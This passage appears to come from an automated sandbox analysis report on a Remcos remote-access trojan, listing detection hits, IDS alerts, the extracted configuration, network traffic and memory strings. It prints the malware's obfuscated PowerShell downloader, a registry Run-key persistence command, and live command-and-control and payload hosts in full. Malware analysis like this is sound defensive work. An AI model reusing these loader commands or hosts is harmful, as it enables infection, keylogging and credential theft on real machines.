'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", ProcessId: 7940, ProcessName: reg.exe
                Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 81.180.144.124, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7800, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49925
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7800, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", ProcessId: 7896, ProcessName: cmd.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7800, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , ProcessId: 7560, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg aanKendg HeteM sqrsmaleSeedsFosi ');$Grasshopper=viruse

                Stealing of Sensitive Information

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7800, TargetFilename: C:\ProgramData\remcos\logs.dat
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-23T17:23:27.606844+020020365941Malware Command and Control Activity Detected192.168.2.949974193.187.91.21253848TCP
                2024-10-23T17:23:29.809919+020020365941Malware Command and Control Activity Detected192.168.2.949976193.187.91.21253848TCP
                2024-10-23T17:24:48.653044+020020365941Malware Command and Control Activity Detected192.168.2.949978193.187.91.21253848TCP
                2024-10-23T17:24:48.755150+020020365941Malware Command and Control Activity Detected192.168.2.949979193.187.91.21253848TCP
                2024-10-23T17:24:57.763118+020020365941Malware Command and Control Activity Detected192.168.2.949980193.187.91.21253848TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-23T17:23:29.437091+020028033043Unknown Traffic192.168.2.949977178.237.33.5080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-23T17:23:14.952726+020028032702Potentially Bad Traffic192.168.2.94992581.180.144.124443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["rj0987654321.duckdns.org:53848:1"], "Assigned name": "r", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I42HQ2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
                Source: Yara matchFile source: 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2715933734.0000000008A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                Source: unknownHTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49925 version: TLS 1.2
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.*j[P source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Automation.pdb source: powershell.exe, 00000005.00000002.1669372747.0000000007535000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*tK source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\<.oeaccount source: msiexec.exe, 00000010.00000002.1958810388.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49976 -> 193.187.91.212:53848
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49978 -> 193.187.91.212:53848
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49974 -> 193.187.91.212:53848
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49979 -> 193.187.91.212:53848
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49980 -> 193.187.91.212:53848
                Source: Malware configuration extractorURLs: rj0987654321.duckdns.org
                Source: unknownDNS query: name: rj0987654321.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.9:49974 -> 193.187.91.212:53848
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49977 -> 178.237.33.50:80
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49925 -> 81.180.144.124:443
                Source: global trafficHTTP traffic detected: GET /Nonaddicting.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ethys.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /3/tVWTkim99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ethys.roCache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /Nonaddicting.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ethys.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /3/tVWTkim99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ethys.roCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exe, 0000000F.00000003.1967295216.00000000009DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: _desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000F.00000003.1967295216.00000000009DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: _desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: bhv6BC6.tmp.15.drString found in binary or memory: exp1.www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: bhv6BC6.tmp.15.drString found in binary or memory: exp2.www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: bhv6BC6.tmp.15.drString found in binary or memory: exp3.www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: bhv6BC6.tmp.15.drString found in binary or memory: exp4.www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: bhv6BC6.tmp.15.drString found in binary or memory: exp5.www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: msiexec.exe, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: bhv6BC6.tmp.15.drString found in binary or memory: realtime.www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: bhv6BC6.tmp.15.drString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: bhv6BC6.tmp.15.drString found in binary or memory: www.linkedin.com0 equals www.linkedin.com (Linkedin)
                Source: msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: ethys.ro
                Source: global trafficDNS traffic detected: DNS query: rj0987654321.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: powershell.exe, 00000005.00000002.1669372747.00000000075BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: powershell.exe, 00000003.00000002.1453412594.0000013F81D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ethys.ro
                Source: msiexec.exe, 00000008.00000003.1913856834.0000000008A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                Source: msiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: msiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp1
                Source: msiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp_G
                Source: msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphy
                Source: msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpt
                Source: msiexec.exe, 00000008.00000003.1913856834.0000000008A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/r
                Source: powershell.exe, 00000003.00000002.1476663613.0000013F90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: powershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.1453412594.0000013F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1633462897.0000000004A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhv6BC6.tmp.15.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: msiexec.exe, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: msiexec.exe, msiexec.exe, 00000011.00000003.1943191450.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943241860.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943268493.000000000338D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: msiexec.exe, 00000011.00000003.1943191450.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943241860.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943268493.000000000338D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.coma
                Source: msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
